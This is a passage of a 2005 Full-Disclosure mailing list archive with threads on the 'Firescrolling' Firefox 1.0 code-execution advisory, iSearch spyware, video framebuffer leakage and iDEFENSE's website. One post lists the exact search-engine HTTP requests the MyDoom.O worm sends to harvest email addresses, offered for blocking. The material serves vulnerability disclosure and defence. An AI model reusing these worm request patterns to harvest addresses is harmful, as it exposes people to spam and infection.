can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary 
code by dragging a scrollbar two times.

__Proof-of-Concept

http://www.mikx.de/firescrolling/

__Status

The exploit is based on multiple vulnerabilities:

bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)

Upgrade to Firefox 1.0.1 or disable javascript.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2005-0527 to this issue.

__Affected Software

Tested with Firefox 1.0 on Windows and Linux (Fedora Core)

__Contact Informations

Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11

mikx


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Xfree86 video buffering?

[Stan Bubrouski]

Riad S. Wahby wrote:
Stan Bubrouski <[EMAIL PROTECTED]> wrote:
 

With this solution someone could intentionally crash your machine to
avoid those routines from running.  I'm not trying to put you down or
anything, in fact I probably know less about video related stuff than
most on the list, this just doesn't seem like the best way to do it.
I have no better suggestions, I'll leave this one to the experts.
   

You've found a valid case where clear-on-shutdown breaks, but your
solution doesn't solve the problem, it exacerbates it!
 

Umm I didn't offer a solution at all?  I clearly said I wasn't wise 
enough to devise a
solution for this... which is why I said I'll leave a solution to the 
experts...

Let's consider the threat here.
- I'm looking at something sensitive on my screen.
- I shut down my computer.
...some time passes...
- Mallory boots my computer and reads out the buffers from my video
 card, thereby obtaining the sensitive information.
By your proposal, we _intentionally_ leave the data on the video card
until Mallory already has access to the machine, trusting that he'll
be stupid enough to load our clear-on-startup video card drivers before
dumping out the framebuffer.
 

Can you read?  I didn't propose any solution I just poked holes in 
someone else's???

The alternative, to clear-on-shutdown, is obviously better under
normal circumstances, since sensitive data are never left in the
framebuffer. In an exceptional case such as the computer crashing and
failing to clear the framebuffer, it's true that the data remain on the
card. Note, however, that we're in the same situation post-crash that
we'd _always_ be in under your proposed system.
 

WHAT PROPOSED SYSTEM?
It's obvious that clear-on-startup is strictly worse than clear-on-
shutdown; implementing the latter will prevent a casual observer from
seeing anything sensitive on the screen at startup, but it doesn't
actually grant you any more security, since the data are still
physically on the card.  Implementing both gives you a slight edge
against a passive attacker in a small range of exceptional cases, so it
might be the right way to do things.
 

I don't think things are that clear at all.  In fact I don't know that 
ANYONE has actually
fully explained the problem and why it is occurring in the first place.

Has anyone ever noticed this behavior with Windows, say, after a crash?
I'm not saying I have (haven't actually run a Windows machine regularly
in years, so I probably wouldn't remember anyway), I'm just curious.
 

I've never observed this problem during the 5 years I've used windows 
2000.  However come to think of
it this problem isn't new.  I remember back in '99 my old p166 which 
indeed used the
vesa driver did this too.  So umm its probably been brought up many 
times before.

Please read things more carefully before responding.  All I did was 
offer a lame hypothetical situation in
which someone else's solution wouldn't work.

-sb
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Xfree86 video buffering?

[Stan Bubrouski]

Riad S. Wahby wrote:
Stan Bubrouski <[EMAIL PROTECTED]> wrote:
 

Umm I didn't offer a solution at all? 
   

Are you making a statement or asking a question?
 

Umm more like wondering what you're talking about.
I clearly said I wasn't wise enough to devise a solution for this...
which is why I said I'll leave a solution to the experts...
   

It's fairly obvious that you either have to do it at shutdown or at
startup.  When else are you going to do it, while the user is viewing
the screen?
 

I wasn't making a case for either argument.
Also, you seem to have taken my email as a personal attack.  Calm down,
dude.  I was participating in a discussion, not holding up a giant "Stan
is stupid" sign.
 

Go ahead and hold up a sign doesn't bother me, if it did I wouldn't be 
posting to public mailling lists.
But if you think I'm sitting here steaming about it your barking up the 
wrong tree :-P

I think you're simply inferring too much from what I'm saying.  That's all.
Best Regards,
sb
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Xfree86 video buffering?

[Riad S. Wahby]

Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> Umm I didn't offer a solution at all? 

Are you making a statement or asking a question?

> I clearly said I wasn't wise enough to devise a solution for this...
> which is why I said I'll leave a solution to the experts...

It's fairly obvious that you either have to do it at shutdown or at
startup.  When else are you going to do it, while the user is viewing
the screen?

Also, you seem to have taken my email as a personal attack.  Calm down,
dude.  I was participating in a discussion, not holding up a giant "Stan
is stupid" sign.

-- 
Riad S. Wahby
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Firescrolling [Firefox 1.0]

[Eric McCarty]

Confirmed Exploit works in Firefox 1.0, however on a side note Microsoft
Anti-spyware prevented the script from executing.



Eric McCarty
Systems Administrator
Internet Security Officer


 

-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 12:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]

__Summary

Remember my Internet Explorer "scrollbar exploit" based on http-equiv's
"What a Drag"? When will people ever learn that "unusual user
interaction" 
can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary code by dragging a scrollbar two times.

__Proof-of-Concept

http://www.mikx.de/firescrolling/

__Status

The exploit is based on multiple vulnerabilities:

bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)

Upgrade to Firefox 1.0.1 or disable javascript.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-0527 to this issue.

__Affected Software

Tested with Firefox 1.0 on Windows and Linux (Fedora Core)

__Contact Informations

Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11

mikx


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Xfree86 video buffering?

[Riad S. Wahby]

Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> With this solution someone could intentionally crash your machine to
> avoid those routines from running.  I'm not trying to put you down or
> anything, in fact I probably know less about video related stuff than
> most on the list, this just doesn't seem like the best way to do it.
> I have no better suggestions, I'll leave this one to the experts.

You've found a valid case where clear-on-shutdown breaks, but your
solution doesn't solve the problem, it exacerbates it!

Let's consider the threat here.

- I'm looking at something sensitive on my screen.
- I shut down my computer.
...some time passes...
- Mallory boots my computer and reads out the buffers from my video
  card, thereby obtaining the sensitive information.

By your proposal, we _intentionally_ leave the data on the video card
until Mallory already has access to the machine, trusting that he'll
be stupid enough to load our clear-on-startup video card drivers before
dumping out the framebuffer.

The alternative, to clear-on-shutdown, is obviously better under
normal circumstances, since sensitive data are never left in the
framebuffer. In an exceptional case such as the computer crashing and
failing to clear the framebuffer, it's true that the data remain on the
card. Note, however, that we're in the same situation post-crash that
we'd _always_ be in under your proposed system.

It's obvious that clear-on-startup is strictly worse than clear-on-
shutdown; implementing the latter will prevent a casual observer from
seeing anything sensitive on the screen at startup, but it doesn't
actually grant you any more security, since the data are still
physically on the card.  Implementing both gives you a slight edge
against a passive attacker in a small range of exceptional cases, so it
might be the right way to do things.

Has anyone ever noticed this behavior with Windows, say, after a crash?
I'm not saying I have (haven't actually run a Windows machine regularly
in years, so I probably wouldn't remember anyway), I'm just curious.

-- 
Riad S. Wahby
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Xfree86 video buffering?

[Riad S. Wahby]

James Tucker <[EMAIL PROTECTED]> wrote:
> Is it not possible to switch processing modes without switching video modes?
> Could a fast(er) operation, such as a blank intermediate pallete be
> loaded to 'wash out' all coloured pixels on the screen?

It seems like worrying about this at startup is the wrong approach. If
I'm looking at a root prompt in X, I'm already trusting the entire video
infrastructure (card, driver, &c) to be secure to whatever extent I
require.  If my driver/card combo has this problem with failing to
explicitly clear video memory at shutdown, and if my solution is to make
sure that the video driver clears the buffer at _startup_, then I'm also
implicitly trusting the next piece of software that's going to touch
that particular framebuffer not to read it out and send it off to
{insert favorite TLA here}.

Why extend your trust to a driver over which you perhaps have no
control?  The driver that is displaying the sensitive data should have
the responsibility of clearing same from the video card's memory.  Any
other solution is only a quick hack; it'll prevent a casual observer
from seeing anything sensitive, but not a dedicated adversary.

-- 
Riad S. Wahby
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Incorrect Classification of iDownload's Product as Spyware...

[Roger A. Grimes]

I've got a solution for this litigation problem for the anti-spyware
companies.

Create a new classification called Recognized Software.  In the
description, tell end users that Recognize software contains both wanted
and unwanted software. The software is in this category because many
users consider it and its actions unwanted. 

Ok, not spyware, just unwanted recognized software.  Easy to prove in
court, not slander, no lawsuit. Let's not quibble over
name-calling...and get to the root of the intent. Does end-user want
this particular software to keep on being installed and used if it knew
its true actions?  

-Original Message-
From: Paul Laudanski [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, February 23, 2005 8:47 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
Subject: Incorrect Classification of iDownload's Product as Spyware...

In a letter received by CastleCops from a law firm representing
iDownload/iSearch Toolbar:

http://castlecops.com/article-5762-nested-0-0.html

It has been found out that another website has received a similar form.

In the next link is our response, with more information on the other
website, Spyware Warrior Blog:

http://castlecops.com/article-5765-nested-0-0.html

Other security sites have picked up the story:

http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-n
ot-malware/
http://www.dslreports.com/forum/remark,12733617%7Emode=flat
http://www.dslreports.com/shownews/60608
http://www.revenews.com/wayneporter/archives/000429.html
http://www.wilderssecurity.com/showthread.php?t=67648

--
Regards,

Paul Laudanski - Computer Cops, LLC.
CastleCops(SM) - http://castlecops.com
http://cuddlesnkisses.com | http://justalittlepoke.com |
http://zhen-xjell.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Incorrect Classification of iDownload's Product as Spyware...

[Dave C]

I frequent and read CC often and couldn't agree more. ISearch gets it's 
hooks so far into a system that it can only be classed as the garbage 
spyware program that it is(IMHO).

Goos job and good luck!
Paul Laudanski wrote:
In a letter received by CastleCops from a law firm representing 
iDownload/iSearch Toolbar:

http://castlecops.com/article-5762-nested-0-0.html
It has been found out that another website has received a similar form.  
In the next link is our response, with more information on the other 
website, Spyware Warrior Blog:

http://castlecops.com/article-5765-nested-0-0.html
Other security sites have picked up the story:
http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-not-malware/
http://www.dslreports.com/forum/remark,12733617%7Emode=flat
http://www.dslreports.com/shownews/60608
http://www.revenews.com/wayneporter/archives/000429.html
http://www.wilderssecurity.com/showthread.php?t=67648
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: But i guess.....

[Stan Bubrouski]

Tanvir wrote:
Dear Stan,
 
Hi. Thanks for answering.
 
But i thought we are dealing here with security and i thought that the 
view this camera present is related to that.
 

Yes but by defualt Axis cameras enable the world to access them.  This 
is not a security issue.

You can click on either 2X or 4X button on the top left corner then 
the picture will enlarge. It dosent seem to me any coat hangers etc... 
What it seem to me is like has captured something or someone and he is 
keeping a look through this camera.
 

Looks to me like simply a security camera...nothing suspicious about it...
That make it a security issue. As many of you on the list are capable 
of tracking that camera owner, or inform authtorities about it. I am 
sitting in Karachi Pakistan and cant do much from here.

Nobody will bother, there are literally thousands and thousands of Axis 
cameras all over the net...pic anything on that page and google it and 
you will find 1+ other cameras just like that one and you can zoom 
those too... but its not a security issue...

 
Warm regards, and thanks for your time.
 
 
Tanvir.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Incorrect Classification of iDownload's Product as Spyware...

[Paul Laudanski]

Thanks for the reply.  As an added note, Slashdot has also picked up the 
story:

http://yro.slashdot.org/yro/05/02/23/1830243.shtml?tid=158&tid=17

Doug Muth writes "According to this article over on DSL Reports, yet 
another spyware author, iDownload, has been sending out cease and desist 
letters to sites that classify their iSearch toolbar as Spyware. Some 
research reveals that yes, iSearch really does take over users' computers. 
A search on Spyware Guide also turns up a writeup on iSearch."

On Wed, 23 Feb 2005, Dave C wrote:

> I frequent and read CC often and couldn't agree more. ISearch gets it's 
> hooks so far into a system that it can only be classed as the garbage 
> spyware program that it is(IMHO).
> 
> Goos job and good luck!
> 
> Paul Laudanski wrote:
> > In a letter received by CastleCops from a law firm representing 
> > iDownload/iSearch Toolbar:
> > 
> > http://castlecops.com/article-5762-nested-0-0.html
> > 
> > It has been found out that another website has received a similar form.  
> > In the next link is our response, with more information on the other 
> > website, Spyware Warrior Blog:
> > 
> > http://castlecops.com/article-5765-nested-0-0.html
> > 
> > Other security sites have picked up the story:
> > 
> > http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-not-malware/
> > http://www.dslreports.com/forum/remark,12733617%7Emode=flat
> > http://www.dslreports.com/shownews/60608
> > http://www.revenews.com/wayneporter/archives/000429.html
> > http://www.wilderssecurity.com/showthread.php?t=67648

-- 
Regards,

Paul Laudanski - Computer Cops, LLC.
CastleCops(SM) - http://castlecops.com
http://cuddlesnkisses.com | http://justalittlepoke.com | http://zhen-xjell.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Incorrect Classification of iDownload's Product as Spyware...

[Paul Kurczaba]

Hi,
   Sometimes you can tell that there is a problem with a software product
when you type the name of it in Google and it comes back with the "Sponsored
Links" as "Remove [software name here]" :)

Check it out:
http://www.google.com/search?hl=en&q=isearch&btnG=Google+Search

-Paul

-Original Message-
From: Paul Laudanski [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, February 23, 2005 8:47 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
Subject: Incorrect Classification of iDownload's Product as Spyware...

In a letter received by CastleCops from a law firm representing
iDownload/iSearch Toolbar:

http://castlecops.com/article-5762-nested-0-0.html

It has been found out that another website has received a similar form.  
In the next link is our response, with more information on the other
website, Spyware Warrior Blog:

http://castlecops.com/article-5765-nested-0-0.html

Other security sites have picked up the story:

http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-not-m
alware/
http://www.dslreports.com/forum/remark,12733617%7Emode=flat
http://www.dslreports.com/shownews/60608
http://www.revenews.com/wayneporter/archives/000429.html
http://www.wilderssecurity.com/showthread.php?t=67648

--
Regards,

Paul Laudanski - Computer Cops, LLC.
CastleCops(SM) - http://castlecops.com
http://cuddlesnkisses.com | http://justalittlepoke.com |
http://zhen-xjell.com



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Please can some one help out. (Off-topic)

[Feher Tamas]

>Can Some body tell me what is this?
>
>http://131.215.133.210/view/index.shtml?videos=one

The IP resolves to "DHCP-133-210.caltech.edu"

I guess it is a webcam scene from their DOOM3 experiments
laboratory (with idbehold L code applied). Higher education
is always fun ...

The only strange things are those coat-hangers in the
background (altough those must be huge ones if they are
actually coat-hangers).

Regards: Tamas Feher.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [Full Disclosure] RE: this IS FUN!!!!

[RandallM]

Jordan wrote:



[Full-Disclosure] this is fun?
Jordan Klein haplo at haplo.net 
Sun Feb 20 11:12:39 EST 2005 

Previous message: [Full-Disclosure] this is fun? 
Next message: [Full-Disclosure] this is fun? 
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] 




I wouldn't call that fun.  It took my system to 100% cpu usage, spawned a 
ton of windows, and eventually caused firefox to crash.  I guess that crash 
was firefox's built-in protection mechanism against this type of DoS.  :-)

I haven't tried this with popup blocking enabled, since this is my work 
machine, and I have to allow popups so our internal sites work.  (Damn, lazy

web developers...)

-- 
Jordan Klein ~  Beware of dragons
haplo at haplo.net  ~  for you are crunchy
UNIX System Administrator~  and go well with ketchup
- Original Message - 
From: "Christian" 
To: 
Cc: "Brandy Simon" 
Sent: Sunday, February 20, 2005 7:51 AM
Subject: Re: [Full-Disclosure] this is fun?

}}

WOW! I had fun trying to capture the source page!!!






thank you
Randall M
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Followup to T-Mobile hack

[Andrew Smith]

More info on the "hacking"

http://www.parishiltonsmobile.com/


On Tue, 22 Feb 2005 09:40:58 +0100 (CET), Feher Tamas
<[EMAIL PROTECTED]> wrote:
> >One top star reached Sunday morning expressed total outrage
> at Paris.
> 
> Is Dubya a star...?
> 
> (Maybe a shooting star. Won't last long.)
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


-- 
zxy_rbt2
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: this is fun

[Feher Tamas]

> http://picserv.on.zoy.org/IM39571.jpg

Detected as "not-virus:Joke.JS.Spawn.d" by Kaspersky AV.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Followup to T-Mobile hack

[Feher Tamas]

>One top star reached Sunday morning expressed total outrage
at Paris.

Is Dubya a star...?

(Maybe a shooting star. Won't last long.)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: T-Mobil hacked - how?

[gf gf]

Ill Will,

Apparently my googling skills aren't up to par.  Mind
posting a link?

As an aside, I'd be shocked that they'd deploy an
architecture like that, brought down by a single point
of failure in a web server, without any defense in
depth.

--gf gf

xillwillx at gmail.com wrote:
just like just about every other webserver gets
hacked, they use third 
party server software that hasnt gone through enough
rigorous testing 
to make sure its not vulnerable to any flaws.. simple
search on google 
will give you the answer



__ 
Do you Yahoo!? 
The all-new My Yahoo! - What will yours do?
http://my.yahoo.com 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

[Joachim Schipper]

On Sat, Feb 19, 2005 at 09:45:30AM +1300, Nick FitzGerald wrote:
> Joachim Schipper to "Edge, Ronald D":
> 
> > > Funny. All I get is a blank white page. Could it be you are expecting me
> > > to trust your site, turn off all my defenses, turn on scripting, to view
> > > the page? You're kidding right, this is just a joke to test participants
> > > gullibility, right?
> > 
> > To be fair, it can be circumvented by just reading the source. However,
> > while Wetware/1.0 is a rather secure Javascript interpreter, it suffers
> > from lack of speed.
> 
> You too eh??
> 
> I think I need a processor upgrade on that machine...
> 
> 8-)
> 
> > In short, I gave up when I got another blank page after finding their
> > front page. Looks like the guys at iDEFENSE are not prepared for this
> > kind of paranoia...
> 
> Seems you need to upgrade to Wetware/1.01.  With that Wetware will 
> quickly note that the "trick" to navigating iDEFENSE's site is to add 
> "&flashstatus=true" or "&flashstatus=false" (the latter is probably 
> more generally preferable) to the end of its internal links, and that 
> this is readily achieved through the copy-and-paste functionality of 
> your operating system/environment...
> 
> 
> Regards,
> 
> Nick FitzGerald

This particular instance barfed with 'error 666-7: too much bother'.
Looks like I'm running a slighly unstable version...



Joachim
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: [SA14304] Internet Explorer/Outlook Express Status Bar Spoofing -- A joke ?

[bitlance winter]

A joke ? ;-)
Secunia says,
"It is by default possible for script code to manipulate information 
displayed in the status bar. However, an error allows manipulation of the 
status bar without using any script code (e.g. in the "Restricted sites" 
zone)."

It is important that Outlook Express users may especially trust information 
displayed in
the status bar since HTML documents are viewed in context of the
"Restricted" zone, which has scripting support disabled.

REGARDS.
--
bitlance winter
_
Express yourself instantly with MSN Messenger! Download today - it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

[bkfsec]

Nick FitzGerald wrote:
Seems you need to upgrade to Wetware/1.01.  With that Wetware will 
quickly note that the "trick" to navigating iDEFENSE's site is to add 
"&flashstatus=true" or "&flashstatus=false" (the latter is probably 
more generally preferable) to the end of its internal links, and that 
this is readily achieved through the copy-and-paste functionality of 
your operating system/environment...

 

It is important to note that Wetware/1.01 is only available on a minor 
subset of subgenus human.  Release notes and known bugs will be released 
shortly pending the end of my NDA with other parties to remain anonymous.

 -God
p.s.  This is a joke and not meant to offend anyone.  If you're 
offended, look in a mirror and repeat after me "I need to lighten up."


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

[Nick FitzGerald]

Joachim Schipper to "Edge, Ronald D":

> > Funny. All I get is a blank white page. Could it be you are expecting me
> > to trust your site, turn off all my defenses, turn on scripting, to view
> > the page? You're kidding right, this is just a joke to test participants
> > gullibility, right?
> 
> To be fair, it can be circumvented by just reading the source. However,
> while Wetware/1.0 is a rather secure Javascript interpreter, it suffers
> from lack of speed.

You too eh??

I think I need a processor upgrade on that machine...

8-)

> In short, I gave up when I got another blank page after finding their
> front page. Looks like the guys at iDEFENSE are not prepared for this
> kind of paranoia...

Seems you need to upgrade to Wetware/1.01.  With that Wetware will 
quickly note that the "trick" to navigating iDEFENSE's site is to add 
"&flashstatus=true" or "&flashstatus=false" (the latter is probably 
more generally preferable) to the end of its internal links, and that 
this is readily achieved through the copy-and-paste functionality of 
your operating system/environment...


Regards,

Nick FitzGerald

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

[Nick FitzGerald]

Edge, Ronald D wrote:

> Funny. All I get is a blank white page. Could it be you are expecting me
> to trust your site, turn off all my defenses, turn on scripting, to view
> the page? You're kidding right, this is just a joke to test participants
> gullibility, right?

Sarcasm noted, but that _is_ standard operating procedure for iDEFENSE.

As I have argued several times before, for example (sorry, URL will 
wrap):

http://lists.netsys.com/pipermail/full-disclosure/2005-
January/030971.html

it seems that at iDEFENSE, having a spiffy, bells-and-whistles website 
that is over-designed by folk with no security clue whatsoever is much 
more important than being a security company.  Now, even MS (at least 
after a bit of borax was poured on it) fixed their security bulletin 
pages so script-disabled browsers could view the entire contents of the 
page, but iDEFENSE steadfastly doesn't, so I guess we can all tell what 
that means about iDEFENSE's business focus.  (Read the above-linked 
item for a more detailed explication of all this.)


Regards,

Nick FitzGerald

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

[Joachim Schipper]

On Fri, Feb 18, 2005 at 07:53:29AM -0500, Edge, Ronald D wrote:
> > Date: Thu, 17 Feb 2005 12:20:30 -0500
> > From: "iDEFENSE Labs" <[EMAIL PROTECTED]>
> > Subject: [Full-Disclosure] iDEFENSE Labs Website Launch
> > To: ,
> > <[EMAIL PROTECTED]>,
> > 
> > Message-ID:
> > <[EMAIL PROTECTED]>
> > Content-Type: text/plain;   charset="us-ascii"
> > 
> > iDEFENSE Labs is pleased to announce the launch of our community site:
> > 
> > http://labs.idefense.com
> 
> Funny. All I get is a blank white page. Could it be you are expecting me
> to trust your site, turn off all my defenses, turn on scripting, to view
> the page? You're kidding right, this is just a joke to test participants
> gullibility, right?
> 
> Ron.

To be fair, it can be circumvented by just reading the source. However,
while Wetware/1.0 is a rather secure Javascript interpreter, it suffers
from lack of speed.

In short, I gave up when I got another blank page after finding their
front page. Looks like the guys at iDEFENSE are not prepared for this
kind of paranoia...
 
Other than the fact it's not really accessible without enabling
Javascript, it might be a fine site, though.

Joachim
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

[Edge, Ronald D]

> Date: Thu, 17 Feb 2005 12:20:30 -0500
> From: "iDEFENSE Labs" <[EMAIL PROTECTED]>
> Subject: [Full-Disclosure] iDEFENSE Labs Website Launch
> To: ,
>   <[EMAIL PROTECTED]>,
> 
> Message-ID:
>   <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset="us-ascii"
> 
> iDEFENSE Labs is pleased to announce the launch of our community site:
> 
> http://labs.idefense.com

Funny. All I get is a blank white page. Could it be you are expecting me
to trust your site, turn off all my defenses, turn on scripting, to view
the page? You're kidding right, this is just a joke to test participants
gullibility, right?

Ron.

Ronald D. Edge
Director of Information Systems
Indiana University Intercollegiate Athletics
[EMAIL PROTECTED] (812)855-9010
http://iuhoosiers.com

The secret of life is honesty and fair dealing. 
If you can fake that, you've got it made. 
--Groucho Marx

 



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: URLs used by W32/MyDoom-O (aka .AX, .BB) to query search engines?

[Patrick Nolan]

> -Original Message-
> From: [EMAIL PROTECTED] 
> Sent: Thursday, February 17, 2005 5:01 PM
> Subject: URLs used by W32/MyDoom-O (aka .AX,.BB) to query search engines?
> 
> Hello List,
> 
> Does anyone have a list of query URLs used by W32/MyDoom-O 
> (Sophos name: 
> http://www.sophos.com/virusinfo/analyses/w32mydoomo.html)
> to dig e-mail addresses from search engines?

Here are examples of the 4 URLs used by that virus, where %domain% is like
the comcast.net in my email address =>

#1 - www.altavista.com

GET /web/results?q=%domain%+email&kgs=0&kls=0&nbq=20 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.altavista.com
Connection: Keep-Alive

#2 - www.google.com

GET /search?hl=en&ie=UTF-8&oe=UTF-8&q=mailto+%domain%&num=100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.google.com

#3 - Search.Lycos.com

GET /default.asp?lpv=1&loc=searchhp&tab=web&query=mailto+%domain% HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: search.lycos.com

#4 - search.yahoo.com

GET /search?p=email+ %domain% &ei=UTF-8&fr=fp-tab-web-t&cop=mss&tab=
HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: search.yahoo.com


> Are these specific enough that there's a chance to catch them 
> in the config of a web proxy (e.g. Squid) and avoid being 
> "blacklisted" by the search engines? (seems to me that Google 
> temporarily blacklists IPs that drown them under such requests)

You could use an IDP signature to block the requesting traffic.

> Greets,
> _Alain_

Regards, 

Patrick Nolan
Virus Researcher - Fortinet Inc.
http://www.fortinet.com 

To Submit A Virus:
pkzip/winzip password infected to
submitvirus at fortinet dot com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Yahoo Problems?

[Niek]

On 2/17/2005 2:23 PM +0100, Macy Gasp wrote:
Sometimes I can't beleive how ignorant and stupid people can be. There
are so many efficient AV products and still worms are running wild... 
:(
Imagine a world without ignorant people, and a worm free internet.
That would be bad for business and jobs.
Niek
--
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Yahoo Problems?

[Macy Gasp]

On Thu, 17 Feb 2005 13:30:43 +0100 (CET), Feher Tamas
<[EMAIL PROTECTED]> wrote:

> The new MyDoom.BB worm misuses Google / Yahoo / Lycos / etc.
> to search for e-mail addresses to be greeted with an
> infected e-mail message.
> 
> See:
> http://www.f-secure.com/v-descs/mydoom_bb.shtml

Sometimes I can't beleive how ignorant and stupid people can be. There
are so many efficient AV products and still worms are running wild... 
:(
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: Yahoo Problems?

[Geza Papp dr (Axelero)]

Hello ,

2005. február 17., 13:30:43, írtad:

FT> The new MyDoom.BB worm misuses Google / Yahoo / Lycos / etc.
FT> to search for e-mail addresses to be greeted with an
FT> infected e-mail message.

FT> See:
FT> http://www.f-secure.com/v-descs/mydoom_bb.shtml

And from Sophos, as MyDoom.O

See:
http://www.sophos.com/virusinfo/analyses/w32mydoomo.html


-- 
Regards,
 Gezamailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Yahoo Problems?

[Feher Tamas]

The new MyDoom.BB worm misuses Google / Yahoo / Lycos / etc.
to search for e-mail addresses to be greeted with an
infected e-mail message.

See:
http://www.f-secure.com/v-descs/mydoom_bb.shtml
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Microsoft Baseline Security Analyzer not seeing KB887742 and KB88 6185 Correction

[Joe Granto]

Enterprise Update Scan Tool:
http://support.microsoft.com/?id=894193

This tool seems to be a solution between MBSA releases. This tool may be 
what you need to detect those fixes. From the URL above:

"Why does this tool exist?
Microsoft delivers this tool for certain bulletins in an MSRC release 
cycle that cannot be detected by the MBSA or the ODT. Each tool is 
specific to an MSRC release cycle."

and

"Why do the MBSA and the ODT not detect this update?
The MBSA and the ODT may not offer full detection for certain bulletins 
in an MSRC release cycle. Full detection may not be available because of 
a limitation of the detection engine or because the product that is 
